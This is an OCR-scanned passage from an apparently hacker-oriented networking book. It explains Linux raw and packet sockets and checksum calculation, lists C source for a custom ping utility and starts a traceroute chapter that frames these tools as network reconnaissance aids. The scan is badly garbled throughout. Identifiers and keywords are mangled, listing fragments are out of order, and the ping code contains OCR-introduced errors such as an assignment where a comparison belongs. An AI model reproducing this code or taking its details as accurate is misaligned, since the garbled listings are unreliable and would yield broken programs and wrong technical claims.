sd = socket (PF INET, SOCK DGRAM, 0); /* Datagram socket */ 

Datagram and stream sockets are suitable for programming most regular applications, but 
they are too limited to be widely-used for programming hacker utilities. For example, they do 
not provide for accessing packet headers below the transport layer, exchanging ICMP mes- 
sages, and constructing and sending custom packets. 

You can consult man 2 socket for more detailed information on stream and datagram 
sockets. 


3.5.2. Network Layer: Raw Sockets 


To obtain access to the network layer, the Sock RAW constant must be used as the type argu- 
ment in the socket () function. This type of socket is called a raw socket. The same values are 
used for the domain argument as for the datagram and stream sockets. The protocol argument 
may be specified as 0 or as the protocol whose packets will be exchanged. The /netinet/in.h 
file contains all possible constants for the protocol argument, some of which were mentioned 
in Section 3.4.2. 

The following are some examples of creating raw sockets: 

/* To receive or send TCP packets */ 

sd = socket (PF INET, SOCK RAW, IPPROTO TCP); 


/* To receive or send UDP packets */ 
sad = socket (PF INET, SOCK RAW, IPPROTO UDP); 


/* To receive or send ICMP packets */ 
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sd = socket (PF INET, SOCK RAW, IPPROTO ICMP); 


/* To send any type of packet */ 

sd = socket (PF_INET, SOCK RAW, IPPROTO RAW); 

You should be aware of an important particularity concerning protocol specification: 
All protocol constants allow the created socket to both send and receive packets, but packets 
(of any type) can only be sent when the IPPROTO RAW constant is specified as the protocol ar- 
gument, Although the compiler will not generate any errors, attempting to receive packets at 
the socket created with the TPPROTO RAW protocol argument will not be successful. 

You can create and send custom packets with raw sockets. However, when a packet is sent, 
its header will be generated by the TCP/IP stack. Therefore, if you need a custom IP header, 
you have to specify the IP HDRINCL option for the raw socket using the setsockopt () 
function as follows: 

const int on = 1; 

if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) <« 0) { 

perror ("setsockopt() failed"); 
exit (-1); 

} 

Only privileged users can create raw sockets. 

Raw sockets do not provide access to header fields of the data link layer; therefore, to ob- 
tain this access, you must use packet sockets. 

For details on raw sockets, consult man 7 raw. 


35.5.3. Data Link Layer: Packet Sockets 


To obtain access to the data link layer, the PE PACKET constant must be used as the domain 
argument for the socket () function. Sockets of this type are called packet sockets. Note that 
this is the only type of socket, for which the PF_PACKET and not the PF_INET constant is speci- 
fied as the domain argument. This type of socket makes it possible to send and receive packets 
at the device driver level (the OSI data link layer). 

Only the SocK RAW or the SOCK DGRAM constant and the type argument can be specified. 
You should remember the difference between these two types. 

With sock RAW, packets are sent to and received from the device driver with the data in 
them unmodified. If a program must processes fields in the received packets, a buffer must be 
prepared to accommodate all packet headers, including the headers of the data link layer. 

The socK DGRAM type operates at a higher level. The TCP/IP stack strips a packet of the 
data-link layer header before passing the packet to the program. Packets sent using SOCK_DGRAM 
packet sockets are automatically tacked a suitable data-link layer header before being sent. 
In other words, a socket of the SocK DGRAM type does not allow access to the data-link 
layer header. 

The number of any protocol that will be used can be specified. The /linux/if_ether.h file 
contains a list of protocols that could be used, some of which were mentioned in Section 3.4. 1. 
If the value of protocol is htons (ETH P ALL), the program will support all protocols. 
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The following are some examples of creating packet sockets: 


/* For receiving or sending TCP packets */ 
sd = socket (PF PACKET, SOCK RAW, htons(ETH P ARP) ); 


/* For receiving or sending IP packets with no access to the data link layer header 
needed */ 
sd = socket (PF_PACKET, SOCK DGRAM, htons(ETH P IP)); 


/* For receiving or sending any type of packets */ 

sd = socket (PF PACKET, SOCK RAW, htons (ETH P ALL)); 

There is another, an obsolete, way of creating a packet socket: In Linux 2.0, the only way 
to obtain a packet socket was to perform the following call: 


socket (PF INET, SOCK PACKET, protocol); 


This method is still supported, but I strongly recommend against using it. The main dif- 
ference between the two described methods is that SocK PACKET uses the old struct 
sockaddr pkt structure to specify the interface, which does not make the physical layer inde- 
pendent. I am only describing this method for creating packet sockets because it is used in 
numerous old programs and you should be able to read their source codes. The same method 
is also used by Richard Stevens in his books. 

A program that uses packet sockets must include the following header files: 

#include <sys/socket.h> 

#include <features.h> /* For the glibc version number */ 

#if jGLIBC >= 2 && GLIBC MINOR >= 1 

#include <netpacket/packet.h> 

#include <net/ethernet.h> /* L2 protecols */ 

felse 

#include <asm/types.h> 

#include <linux/if packet.h> 

#include <linux/if_ether.h> /* L2 protocols */ 

#endif 

Packet sockets have a special socket address structure: 

struct sockaddr ll { 


unsigned short sll_family; /* Always AF PACKET */ 
unsigned short sll protecol; /* Physical layer protocol */ 
int sll_ifindex; /* Interface index */ 
unsigned short s11 hatype; /* Header type */ 

unsigned char sll pkttype; /* Packet type */ 

unsigned char s1l_halen; /* Address length */ 


unsigned char sll addr[8]; /* Physical layer address */ 


For details on packet sockets, consult the man 7 packet. 


3.6. Checksum in Packet Headers 


Most packet headers have a checksum field. The algorithm for calculating the checksum is 
described in the RFC for each protocol. By default, the TCP/IP stack fills the checksum field of 
all headers when sending packets and verifies the checksum when receiving packets. 
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But if packet header fields of raw sockets or packet sockets have to be filled manually, 
the checksum values have to be calculated and placed into the checksum fields manually. 
The TCP/IP stack on the receiving side will not accept a packet with an unfilled checksum 
field for processing and will simply drop it as an error packet. 

Pursuant to the protocol RFCs, the same algorithm is used for calculating the checksum in 
the IP, UDP, TCP, ICMP, and IGMP headers. ‘The following is a description of the algorithm: 

The checksum field is the 16-bit one’s complement of the one’s complement sum of all 16-bit 
words in the header and text. If a segment contains an odd number of header and text octets to be 
checksummed, the last octet is padded on the right with zeros to form a 16-bit word for checksum 
purposes. The pad ts not transmitted as part of the segment. 

Unfortunately, there is no standard function for calculating the checksum. The examples 
in this book use the well-known C implementation of such function. Its source code is shown 
in Listing 3.7. There is nothing to stop you from writing your own, more efficient, version. 





Listing 3.7. Checksum calculation function 





unsigned short in _cksum(unsigned short *addr, int len) 


unsigned short result; 
unsigned int sum = 0; 


/* Adding all 2-byte words */ 
while {len > 1) { 
sum += *addr++; 
len -= 2; 
j 
/* Adding any leftover bytes to the sum */ 
it. (tien: == 1} 
sum += *(unsigned char*) addr; 


sum = (sum >> 16) + (sum & OXFFFF); /* Adding the carry */ 
sum += (sum >> 16); /* Adding the carry again */ 
result = ~sum; /* Inverting the result */ 
return result; 

} 





As you can see, the in cksum() function is passed the starting address and the length 
of the data, for which the checksum needs to be calculated. The starting address and the length 
of data values are different for IP, UDP, TCP, ICMP, and IGMP. These values are determined 
for each type of header as follows: 


O JCMP Header Checksum. The checksum is calculated on all bytes in the ICMP header and 
the data field. Consequently, the starting address of the ICMP header and the total length 
of the ICMP header and the data field must be passed to the in_cksum() function. 

O JP Header Checksum. The checksum is calculated on the [P header only; the data field 1s 
not used in the calculations. Accordingly, the starting address and the length of the IP 
header must be passed to the in_cksum() function. 
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O TCP Header Checksum. In addition to the TCP header and the data field, the checksum is 


calculated on the 96 bytes of the so-called pseudo header, placed before the TCP header. 
This pseudo header is not sent to the network and is only used for local operations. The 
pseudo header contains the source IP address, a 0 byte, a Protocol field analogous to the 
same field in the IP header, and the length of the TCP packet (see Fig. 3.10). The length of 
the TCP packet is the overall length of the TCP header and of the data field in bytes. In 
this way, TCP protects against misrouted segments. 


source — 
Destination address 
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Fig. 3 3.10. The pseudo header for calculating TCP header checksum 


The source code for the pseudo header structure used in the programs in this book is 


shown in Listing 3.8. 





Listing 3.8. The TCP pseudo header structure 





Struct pseudohdr 


{ 


a 


unsigned int source address; 
unsigned int dest address; 
unsigned char place holder; 
unsiqned char protocol; 
unsigned short length; 
pseudo hdr; 





Thus, when calculating the checksum for the TCP header, the in cksum() function must 


be passed the starting address of the pseudo header and the total length of the pseudo header, 
TCP header, and the data field. 


O UDP Header Checksum. This checksum is calculated in the same way as the TCP header 


checksum, that is, a 96-bit pseudo header placed before the UDP header is used in the cal- 
culations. This pseudo header is not sent to the network and is only used to calculate the 
checksum. The structure of the UDP pseudo header is virtually the same as that of the 
TCP pseudo header (Listing 3.8), the only difference being the length of the UDP packet 
specified in the Length field (see Fig. 3.11). The length of the UDP packet is the overall 
length of the UDP header and of the data field in bytes. 
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Source address 
(32 bits) 
Destination address 
(32 bits) 


Length (UDP header + data) 
(16 bits) 
(aes Sate Rete es Seas 





Fig. 3.11. The eeeandet header for calculating the UDP header checksum 


Thus, when calculating the checksum for the UDP header, the in cksum() function must 
be passed the starting address of the pseudo header and the total length of the pseudo header, 
UDP header, and the data field. 

There is one important specification concerning the UDP header checksum in RFC 678 
that is absent in the specifications for the other protocols. Its states the following: If the com- 
puted checksum is zero, it is transmitted as all ones (the equivalent in one’s complement arithmetic). 
An all-zero transmitted checksum value means that the transmitter generated no checksum. 

Thus, you must check the value of the UDP header checksum returned by the 
in cksum() function and replace it with the Oxffff value if it is zero. Note that this procedure 
does not have to be performed for other headers, because a zero-value checksum for the IP, 
TCP, and ICMP headers does not mean that it was not calculated. 

An important thing to remember is that if a single byte in the header or in the data field 
changes, the checksum must be recalculated. For example, if the value of the time-to-live 
(TTL) field in the IP header changes, the checksum field in this header must be recalculated. 

Before calculating the checksum, the checksum field must be zeroed out. This RFC 
requirement applies to all considered headers. Therefore, in the example programs, the check- 
sum field is set to 0 before the in cksum() function is called. 


3.7. Nonstandard Libraries 


To make the task of writing network utilities easier, you can take advantage of nonstandard 
third-party libraries, the best known of which are libnet and libpcap. 

The libnet library (http://www.packetfactory.net/projects/libnet/) provides program- 
mers with all necessary tools and utilities for generating packets of any format and content. 

The libpcap library (http://www.tcpdump.org) serves the reverse purpose: extracting 
packets from the network and analyzing them. 

Both libraries can be used in a program at the same time. 

Many well-known utilities, such as tcpdump and the latest versions of nmap, use the libnet 
and libpcap libraries. For the most part, however, hackers avoid using nonstandard libraries 
when developing their tools so as not to make their code dependent on those libraries. In this 
case, the necessary libraries would have to be installed before the utility could be used, which 
is not convenient and often not possible. Using the libnet and libpcap libraries to program 
network hacker software is considered in Chapter 9. 


Chapter 4: Ping Utility 








The ping utility is a standard utility in any full-featured operating system. The original pur- 
pose of this utility is to check the availability of a remote host, not to be used as a network 
hacking tool. But hackers can use ping to probe the network (ping sweep) for computers to 
attack. Nowadays, administrators use firewalls to block incoming and outgoing ICMP mes- 
sages on both individual computers and network gateways, which makes probing using ping 
ineffective. Nevertheless, it is important to know the internal workings of ping, because many 
network attack utilities are based on the same operation principles, for example, denial-of- 
service ICMP flooding and Smurf (see Chapter 6). Also, ping is frequently integrated with 
network scanning utilities (see Chapter 7). 


4.1. General Operation Principle 


The ping utility was created by the late Mike Muuss, a former employee of the U.S. Army Bal- 
listic Research Laboratory, who wrote the first version of ping in 1983 for the 4.2a BSD UNIX 
operating system. The name ping is not an acronym, nor was it randomly selected by Muuss. 
According to his site (http://ftp.arl.mil/~mike), the utility was named after the sound sonar 
makes. The ping utility imitates sonar or radar operation in computer networks. It sends 
ICMP echo requests to the specified IP address or host name, receives ICMP echo replies, and 
calculates the round-trip time for the packets. 

The following is an example of invoking ping in Linux and the results it produces: 

# ping 192.168.10.1 

PING 192.168.10.1 (192.168.10.1) from 192.168.10.130 : 56(84) bytes of data. 
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64 bytes from 192.166.10.1: 
64 bytes from 192.168.10. 
64 bytes from 192.1686.10. 


icmp seq=0 ttl=255 time=6.7/60 msec 
> lomp seq=l ttl=255 time=411 usec 
: iemp seq=2 ttl=255 time=301 usec 
: iemp seq=3 ttl=255 time=375 usec 
: iomp seq=4 ttl=255 time=369 usec 
: iemp_seq=5 ttl=255 time=299 usec 
: icmp seq=6 ttl=255 time=355 usec 
: icmp seq=7 ttl=255 time=366 usec 


4 

4 bytes from 192.168.10. 
64 bytes from 192.168.10. 
64 bytes from 192.168.10. 

4 bytes from 192.168.10. 

4 bytes from 192.166.1090. 

4 


7 ; + 7 


4 bytes from 192.168.10.1: icmp _seq=8 ttl=255 time=291 usec 
-—=- 192,.166.10,1 ping statistics --- 

9 packets transmitted, 9 packets received, 0% packet loss 

round-trip min/avg/max/mdev = 0.291/1.058/6.760/2.016 ms 

The utility places the output data in the following columns: the number of received bytes, 
the IP address and the name (if there is one) of the host being probed, the sequence number 
of the packet (icmp seq), the packet’s TTL as specified in the IP header, and the calculated 
round-trip time. By default, the utility sends and receives ICMP packets until the <Ctrl>+<C> 
key combination is pressed. After the program is terminated, it outputs statistics: the numbers 
of transmitted and received packets, the percentage of lost packets, and the minimum, maxi- 
mum, and average packet round-trip time. The later versions of ping also output the mdev 
parameter. Unfortunately, I have not been able to find a single mention of this parameter in 
the utility’s man, but as far as I can judge from the parameter’s name, it shows the standard 
deviation. Because this parameter is from the statistics domain, | will not consider it when 
developing a custom ping utility. 

Echo replies must arrive in the same order they were sent. Because packets can be lost 
during transmission, there may be gaps in the sequence numbers. In the statistics, the number 
of the received ICMP messages may be different from that of the sent messages. 

Using the open source code of the ping utility, | show you how to write a custom version 
of this program. The chief difference between the custom and the publicly available versions is 
that the custom program does not support the command line parameters. The standard utility 
has about 20 of these, and their number grows every time a new version comes out. Rather 
than being a drawback, the absence of the command line parameters is an advantage, because 
this allows you to understand the main operating principles of the utility without distracting 
your attention with multiple parameters. I personally derived substantial help in understand- 
ing how the ping utility works from the UNIX Network Programming book by Richard Ste- 
vens, Which considers implementation of the ping utility for both IPv4 and IP v6. 

The ping operation is based on ICMP, so you need to recall the format of ICMP messages. 
The format depends on the message type; the main types are given in Table 3.1. 

For the task at hand, of interest are only two types of ICMP messages: echo request and 
echo reply, which have the same format (see Fig. 3.9). 

The type field holds 0 for the echo reply message and 8 for the echo request message. 
The code field always holds 0 for both types of messages. The checksum must be calculated 
and entered into the checksum field. The algorithm for calculating the checksum is described 
in RFC 792, and Listing 3.7 gives the source code, in C language, of a function for calculating it, 
which will be used in the custom program. The identifier and sequence number fields can be 
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used by the sender of echo messages to identify arriving packets. The ping utility places its 
PID into the identifier field and increments the value of the sequence number by 1 for each 
sent packet. The data field may contain arbitrary data; a time stamp of the packet departure 
is saved in this field, which allows the packet's round-trip time to be calculated when the reply 
is received, Pursuant to RFC 792, the contents of the identifier, sequence number, and data 
fields must be returned in the echo reply message. 

For the custom utility, the definition of the ICMP structure from the /netinet/ip_icmp.h 
header file will be used. Look at the icmp structure in this header file; note that it is somewhat 
different from the structure shown in Listing 3.6. This structure defines all types of ICMP 
messages in one sweep. According to the echo request and echo reply formats, only the follow- 
ing fields will be needed for the custom ping utility: icmp type, icmp code, icmp_cksum, 
icmp id, icmp seq, and icmp data. Some of the field names are contractions for more com- 
plex constructions: 

#define icmp id icmp hun.ih idseq.icd id 

#define icmp seq icmp hun.ih_ idseq.icd seq 

#define icmp data icmp dun.id data 

All ICMP messages must have an IP header, in which the value of the protocol field is set to 
1 (IPPROTO IcmMP). The format of the IP header is shown in Fig. 3.5; its full description can be 
found in RFC 791. The IP header structure is defined in the /netinet/ip.h header file. This file 
will also be included in the custom ping utility. 

Figure 4.1 shows a diagram of the ICMP message with the IP header and with the names 
of the pointers and lengths that will be used in the program when processing echo replies. 


iplen | icmplen | 





ICMP | ICMP 
| header header | 


20-60 bytes a 


ip icmp 


Fig. 4.1. Headers, pointers, and lengths used in processing of ICMP replies 


You may have noticed that the ICMP message has no source and destination port num- 
ber fields. This raises the question of what service sends echo replies to echo requests. But 
there are no special applications or services waiting for echo requests, and echo replies are 
generated by the IP subsystem of a node. When an IP subsystem receives a type 8 (echo re- 
quest) ICMP message, it must send a reply. To this end, it switches places of the source ad- 
dress and the destination address, changes the message type to 0 (echo reply), and recalcu- 
lates the checksum. 
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4.2. Constructing a Custom Ping Utility 


The source for the custom ping utility is shown in Listing 4.1.1 called it xping.c to distinguish 
from the standard system utility. 

Consider the main problems that must be solved when programming a ping utility. 

For receiving and sending ICMP messages, a raw socket (SOCK RAW) must be created in the 
socket (), with the IPPROTO ICMP constant specified as the protocol: 

sd = socket (PF INET, SOCK RAW, IPPROTO ICMP); 


Although the IPPROTO ICMP constant is defined in the /netinet/in.h header file, it is not 
necessary to include this file in the program, because it is included in the /netinet/ip.h and 
/netinet/ip_icmp.h header files. 

Only privileged users can create a raw socket; therefore, the standard Linux ping utility 
has the set user identifier (SUID) bit set (shown here in bold in the 1s command output): 

3 ls -1 /bin/ping 

~rwar-kKr-x l root root 22620 Jan 16 2001 /bin/ping 

After the custom ping utility is compiled and build, it can also have the SUID bit set so 
that regular users can use it. 

In the program itself, the original user rights are restored after a raw socket is created 
using the setuid() function: 

setuid (qetuid()); 


For the utility to be able to broadcast messages, the SO BROADCAST socket parameter is set 
using the setsockopt () function: 
setsockopt (sd, SOL SOCKET, SO BROADCAST, &on, sizeof(on)); 


The standard ping utility can send broadcast messages only when the -b option is speci- 
fied in the command line at launching. This precaution is well justified, because sending 
a broadcast message into a multinode network may cause denial of service at the sending node 
because of multiple echo replies. 

To prevent numerous echo replies from overflowing the receiving buffer, its size is set to 
61,440 bytes (60 x 1,024), which is sufficiently large and is larger than the default buffer size in 
the standard utility. The receiving buffer size is set using the setsockopt () function with the 
SO_RCVBUF parameter: 

size = 60 *1024; 

setsockopt(sd, SOL SOCKET, SO RCVBUF, &size, sizeof(size)); 

The standard ping utility sends echo requests at the rate of one per second; therefore, for 
the custom utility, the setitimer() function is used to set the timer to generate the SIGALRM 
signal every second during the program run: 

struct itimerval timer; 

/* Starting a timer to send the SIGALRM signal */ 

/* Timer will kick in after 1 microsecond */ 

timer.it value.tv_ sec = 0; 

timer.it value.tv usec = 1; 

/* Timer will activate every second */ 

timer.1t_interval.tv_sec = 1; 
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timer.it_interval.tv_usec = 0; 

/* Starting the real-time timer */ 

setitimer (ITIMER REAL, &timer, NULL); 

To intercept the SIGALRM signal, a signal handler is set using the sigaction() function: 


/* Setting the handler for the SIGALRM and SIGINT signals */ 
memset (asact, 0, sizeof(act)); 

/* The catcher({) function is assigned as the handler */ 
act.sa handler = s&catcher; 


Sigaction(SIGALRM, &act, NULL); 


The handler for the signal is the catcher () function; upon arriving of the SIGALEM signal, 
it simply calls the pinger () function, which sends echo requests: 

void catcher({int Signum) 

{ 

if (signum == SIGALRM) 
i 

pinger(); 

return; 
} 

Thus, every second the program calls the pinger() function, which sends one echo re- 
quest per call. 

After the program is terminated (the user presses the <Ctrl>+<C> key combination), 
it must output the statistics of the packet transmittal and receiving. This key combination 
sends the SIGINT signal, so a handler for this signal must also be added to the program: 

Sigaction(SIGINT, &act, NULL); 


The signal will be handled by the same catcher () function. 

The packet round-trip time is calculated using the following simple solution: Before an 
echo request is sent, the current system time is determined using the gettimeofday () 
function and is entered into the data field (icmp->icmp data) of the ICMP packet being sent: 


gettimeofday( (struct timeval *) icmp->icmp data, NULL); 


As already mentioned, the contents of the data field in an echo reply message must be 
identical to those of the corresponding echo request message. When an echo reply is received, 
the current system time is determined again using the gett imeofday() function, and the dif- 
ference between the current system time and the time saved in the packet will be the round- 
trip time sought. In the program, this difference is determined by the tv sub () function, 
which calculates the difference between two timeval structures and saves the result in the first 
one. The number of seconds in the current system time (out->tv_sec) cannot be less than the 
number of seconds in the arriving echo reply (in->tv_usec). The number of microseconds 
(tv_usec), however, can. Therefore, in case of a difference with negative microseconds, | second 
must be subtracted from the seconds result and 1,000,000 must be added to the negative mi- 
crosecond result to produce the correct decimal value. 

Then the packet's round-trip time is converted from microseconds to milliseconds: 

rtt = tvrecv->tv_sec * 1000.0 + tvrecv->tv_usec / 1000.0; 


Before sending a packet, all fields of the ICMP message must be filled. This is done in the 
pinger () function. 
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The type field (icmp->icmp type) is set to the message type. The ICMP_ECHO constant is 
defined in the /netinet/ip_icmp.h header file; some of the other message type constants are 
given in Section 3.4.6. 

The identifier field (icmp->icmp id) is set to the PID of the program process. This PID is 
checked when an echo reply message arrives. If multiple copies of the program were launched, 
the PID is used to separate only those for the current process. 

The sequence number field (icmp->icmp seq) is set to the packet’s sequence number us- 
ing the nsent global constant, which is incremented by 1 for each subsequent sent packet. 

Pursuant to RFC 792, the checksum field (icmp->icmp cksum) must be zeroed out before 
storing the checksum in it. Then the checksum is calculated using the in_cksum() function 
and the result is stored in the checksum field. 

There is also a checksum field in the [IP header; this checksum is calculated using the same 
algorithm, but it is done so on the header only, not on the entire packet. No fields in the IP 
header, including the checksum field, have to be filled manually, because all this will be done 
by the IP subsystem. 

The in cksum() function is passed the length of the ICMP and data in the icmplen 
variable. The length of the ICMP header is only 8 bytes, but the data are traditionally allocated 
56 bytes; because the length of the timeval structure is 8 bytes, the remaining bytes are filled 
with trash data. I will not depart from the tradition initiated by Mike Muuss and will allocate 
56 bytes for data. Thus, the icmplen length will be 64 bytes. 

You should be able to understand the rest of the program source code with the help of the 
comments given in the code (Listing 4.1). 

The source code for the custom ping utility can be found in the \PART II\Chapter 4 
folder on the accompanying CD-ROM. 





Listing 4.1. Th 





#include 
#include 
#include 
#include 
finclude 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


<stdio.h> 
<stdlib.h> 
<string.h> 
<erro,h> 
<sys/types.h> 
<sys/socket .n> 
<netinet/ip.h> 
<netinet/ip icmp.h> 
<netdb.h> 
<sys/time.h> 
<signal.h> 
<unistd.h> 


#define BUFSIZE 1500 


int sd; 


pid_t pid; 
struct sockaddr in servaddr; 


e source code for the custom ping utility (xping.c) 


/* Socket descriptor */ 


/* Program's PID */ 


/* Structure for sending a packet 
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struct sockaddr in from; /* Structure for receiving a packet */ 


double tmin = 999999999.0; /* Minimum round-trip time */ 


double tmax = 0; /* Maximum round-trip time */ 

double tsum = 0; /* Sum of all times for calculating the 
average time */ 

int nsent = 0; /* Number of sent packets */ 

int nreceived = 0; /* Number of received packets */ 


/* Function protetypes */ 

void pinger (void) ; 

Wold output (char *, int, struct timeval *); 
yoLd catcher (int); 

void ty_sub(struct timeval *, struct timeval *); 
unsigned short in cksum(unsigned short *, int); 


i* 2 PP Ne ee «if 
/* The main() function */ 
j*- ee ee ae ee * f 


int main(int arge, char *argv[)) 
{ 
int size; 
int fromlen; 
int n; 
Struct timeval tval; 
char recvbuf [BUFSIZE]; 
struct hostent *hp; 
struct sigaction act; 
Struct itimerval timer; 
const int on = I; 


1f fargo f= 2) { 
fprintf(stderr, "Usage: §s <hostname>\n", argv[0)); 
exit(-l); 


} 
pid = getpid(); 


/* Setting the handler for the SIGALRM and SIGINT signals */ 
memset(&act, 0, sizeofl(act)); 

/* Assigning the catcher() function as the handler */ 
act.sa_handler = 4catcher; 

Sigaction(SIGALRM, &act, NULL); 

sigaction(SIGINT, &é&act, NULL); 


if ( (hp = gethostbyname(argv[1]}) == NULL) { 
herror ("gethostbyname() failed"); 
exit({-1); 


if ( (sd = socket (PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) { 
perror("socket{) failed"); 
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exit (-1); 
} 


/* Restoring the initial rights */ 

setuid(getuid()); 

/* Enabling the broadcasting capability */ 

setsockopt (sd, SOL SOCKET, SO BROADCAST, Gon, sizeof(on)); 
/* Increasing the receiving buffer size */ 

size = 60*1024; 

setsockopt (sd, SOL. SOCKET, SO RCVBUF, &size, sizeof(size)); 


/* Starting a timer to send the SIGALRM signal */ 
/* Timer kicks in after 1 microsecond */ 

timer.it value.tv sec = Q; 

timer.it_value.tv_usec = 1; 

/* Timer fires every second */ 

timer.it interval.tv_ sec = 1; 
timer.it_interval.tv_usec = 0; 

/* Starting the real-time timer */ 
setitimer(ITIMER REAL, &timer, NULL); 


bzerolaéservaddr, sizeof (servaddr) ); 
servaddr.sin family = AF_ INET; 
servaddr.sin addr = *((struct in addr *) hp->h addr); 


fromlen = sizeof (from); 


/* Starting an endless loop to receive packets */ 
while (1) { 
n= recyvfromi(sd, recvbuf, sizeof(recvbuf), 0, 
{struct sockaddr *)é&from, &fromlen); 


if in< 0) { 
if {errno == EINTR) 
continue; 
perror("recvfrom() failed"); 
continue; 


} 
/* Determining the current system time */ 


gettimeofday(é&tval, NULL); 


/* Calling the function to parse the received */ 
/* packet and display the data */ 
output (recvbuf, n, é&tval); 

} 


return 0; 
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void output(char *ptr, int len, struct timeval *tvrecv) 
{ 

int iplen; 

int icmplen; 

struct ip *ip; 

struct icmp *icmp; 

struct timeval *tvsend; 

double rtt; 


ip = (struct ip *) ptr; /* Start of the IP header */ 
iplen = ip->ip hl << 2; /* Length of the IP header */ 


icmp = (struct icmp *) (ptr + iplen); /* Start of the ICMP header */ 
if ( (icmplen = len - iplen) < 8) /* Length of the ICMP header */ 
fprintf(stderr, "icmplen (%#d) < 8", icmplen); 


if (icmp->icmp type = ICMP ECHOREPLY) { 


if (icmp->icmp id != pid) 
return; /* Reply is to another ping's echo request. */ 


tvsend = (struct timeval *) icmp->icmp data; 
tyv_sub(tvrecv, tvsend); 


** Round-trip time */ 
rtt = tvrecv->tv_sec * 1000.0 + tvrecv->tv_usec / 1000.0; 


nreceived++; 


tsum += rtt; 

if ({rtt < tmin) 
fmin = rtt; 

if (rtt > tmax) 
tmax = rtt; 


printf ("td bytes from ts: icmp_seg = tu, ttl = td, time = %.3f ms\n", 
icmplen, inet ntoa(from.sin_addr), 


lcomp->icmp seq, ip->ip ttl, rtt); 


} 
] 
fh eee oo nn ee eee eee x 
/* Forming and sending an ICMP echo request packet */ 
/* pa ee ee Pa er ceed aa tate eet peer ep ep ies a ete ee * if 
void pinger (void) 
{ 

int icmplen; 


struct icmp *icmp; 
char sendbuf [BUFSIZE]; 


icmp = (struct icmp *) sendbuf; 
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—_— 


/* Filling all fields of the ICMP message */ 

icmp->icmp type = ICMP ECHO; 

icmp->icmp code = 0; 

icmp->icmp id = pid; 

icmp->icmp_ seq = nsent++; 

gettimeofday((struct timeval *) icmp->icmp data, NULL); 


/* Length is 8 bytes of ICMP header and 56 bytes of data */ 
icmplen = 8 + 56; 

/* Checksum for the ICMP header and data */ 

icmp->icmp_cksum = 0; 

iemp->iemp cksum = in cksum({(unsigned short *) icmp, icmplen); 


if (sendto(sd, sendbuf, icmplen, 0, 
(struct sockaddr *)a&servaddr, sizeof(servaddr)) < 0) { 
perror("sendto() failed"); 


@exit(-1); 
} 
} 
f Meee e nnn nnn one eee ee eee eee ee eee eee eee eens esses ~/ 
im sian one timeval structure from another */ 
/* a af 


void tv_sub(struct timeval *out, struct timeval *in) 
{ 
if ( (out->tv_usec -= in->tv_usec) < Q) { 
out->tv_sec--; 
out->tv usec += 1000000; 
] 


out->ty sec -= in->tv_sec; 


ft ences 2 --- eee --H - - - - - - - - - - - - - - et ree * f 
/* The handler for the SIGALRM and SIGINT signals */ 
NN EE oy OE Ee ---*; 


void catcher(int signum) 
{ 
if (signum == SIGALRM) 
{ 
Pinger ()}; 
return; 
} else if (signum == SIGINT) { 
printf("\n--- $5 ping statistics ---\n", inet_ntoa(servaddr.sin addr) ); 


printf ("td packets transmitted, ", nsent); 
printf ("td packets received, ", nreceived); 
if (nsent) 


{ 
if (nreceived > nsent) 
printf ("-- somebody's printing packets!"); 
else 
printf (“tdt% packet loss", 
(int) ({({{nsent-nreceived)*100) / 


nsent)); 
} 
printt("\n"); 
if (nreceived) 


printf (“round-trip min/avg/max 


tmin, 
tsum / nreceived, 
tmax ) ; 
Eflush (stdout) ; 
exit (<1); 
} 
} 
j*e———. a i are ria a eee Se oS * / 


/* Calculating the checksum */ 


unsigned short in_cksum(unsigned short *addr, int len) 


{ 


unsigned short result; 
unsigned int sum = 0; 


/* Adding all 2-byte words */ 
while (len > 1) { 

sum t= *addr++; 

len -= 2; 
} 
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%.3f/%.3f/%.3£ msin", 


/* If there is a byte left over, adding it to the sum */ 


if (len == 1) 
Sum += *(unsigned char*) addr; 


sum = (sum >> 16) + (sum & OXFFFF); /* Adding the carry */ 


sum += (sum >> 16); 
result = ~sum; 
return result; 


/* Adding the carry again */ 
/* Inverting the result */ 
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fi 





Like ping, traceroute Is a standard utility in any regular full-featured system. The Windows 
version of the utility is called tracert. 

The function of the traceroute utility is to trace the route taken by packets to reach the 
specified host. Hackers use traceroute as a war utility for determining the topology of a net- 
work and the ways of penetrating it. In essence, traceroute can be used to perpetrate a pas- 
sive break-in. 

The creator of the utility is Van Jacobson, who wrote the first version of it for UNIX 
in 1988. 

The following is en example of starting the utility and the results of its execution: 


# traceroute www.sklyaroff.ru 
traceroute to MVE SR LY SEORS ru (194.135.22.233), 30 hops max, 38 byte packets 


1 212.220.221.251 (212.220. as 251) 159.038 ms 159.891 ms 140.623 ms 

2 212.220.221.254 (212.220. 254) 148.533 ms 149.416 ms 151.226 ms 

3 uralcom-rtcomm-1l.urtc.ru (195. 38.35.253) 160.017 ms 160.321 ms 141.133 ms 

4 493.47.87.217 (193.47.87.217) 137.544 ms 140.341 ms 159.953 ms 

5 od . + 

6 ebgl4.ebq24.f04.transtelecom.net (217.150.47.50) 150.363 ms 148.776 ms 140.048 ms 
7 Relcom-gw.transtelecom.net (217.150.39.129) 218.521 ms 189.156 ms 189.614 ms 


8 KIAE-16.relcom.net (193.124.254.169) 191.221 ms 191.360 ms 179.513 ms 

9 kiae-spider-l.relcom.net (194.58.41.10) 179.634 ms 189.361 ms 189.632 ms 

10 194.135.22.233 (194.135.22.233) 191.155 ms 189.331 ms 199.275 ms 

Currently, there are two versions of traceroute: One that uses a datagram socket to send 
UDP packets and one that uses a raw socket to send ICMP packets. Traditionally, UNIX-like 
operating systems, including Linux, implement the former version and Windows implement 
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the latter. UNIX traceroute, however, has the -1 flag, which is used to make the utility send 
ICMP packets, that is, to make it work as Windows tracert. Windows tracert, on the other 
hand, cannot be made to work as traceroute; that is, it cannot send UDP packets. 

I consider implementing the datagram socket version of the utility first, and then the 
second version (with both versions, naturally, intended for execution on Linux systems). 
Note that the node being probed can block either UDP or ICMP packets, so a hacker may 
need both of these versions. 


5.1. Version 1: Using a Datagram Socket 
to Send UDP Packets 


The source code for a custom traceroute utility is shown in Listing 5.1. I called it tracerudp.c 
to distinguish it from the standard system utility. The main difference between the standard 
and the custom versions is that the latter will not support the command line parameters, of 
which the standard utility has more than 15, 

The traceroute utility uses the TTL field in the IP packet header (see Section 3.4.2), 
whose value designates the number of networks, on which the datagram is allowed to travel 
before being discarded by a router. The TTL value is decremented by 1 by every router it ar- 
